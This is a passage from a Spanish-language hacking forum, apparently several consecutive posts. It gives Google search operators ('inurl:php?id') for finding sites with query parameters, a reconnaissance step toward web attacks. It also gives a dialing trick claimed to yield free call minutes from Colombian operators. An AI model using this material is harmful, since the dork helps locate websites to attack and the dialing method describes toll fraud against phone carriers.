(cuidado con lo que encuentran, todo es bajo su responsabilidad)

ponen en google

inurl:php?id //tipo de pagina que quieran

inurl:php?id noticias //ejemplo








Saludos y un gusto compartir!
[/b]
#56
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Funciona
pero seguro lo descuentan con la próxima recarga..
Regards....

No lo descuentan, son minutos gratis, gracias a las operadoras
#57
Hola muchach@s, soy nuevo en este foro pero quisiera compartirles una informacion que me ah servido mucho y en algunos casos me ah sacado de apuros, se trata de obtener 5 a 10 minutos gratis, de cualquier operador, es algo viejo pero todavia sirve

Primero marcamos 018000196000 y llamamos , esperamos unos segundos y nos contestara una operadora, rapidamente marcamos 57 que es el numero del pais (Colombia) y seguido el numero al que vallamos a marcar, quedaria algo asi 5731******* y listo obtendremos de 5 a 10 minutos gratis, sirve para todas las operadoras

ya lo eh probado y sirve perfectamente, creeria que para otros paises solo hace falta cambiar el codigo del pais, en vez de 57 marcamos en codigo correspondiente a su pais y seguido el numero, pruebenlo y me avisan!

Espero les sirva, saludos!

#58
¿y donde esta Debian? hace falta uno de los grandes...
#59
cosas interesantes se pueden encontrar hay
#60
Hacking / Re:Espiando satelites desde casa
Julio 01, 2017, 09:03:27 PM
muy interesante!, quizas se puedan editar esas ondas no crees?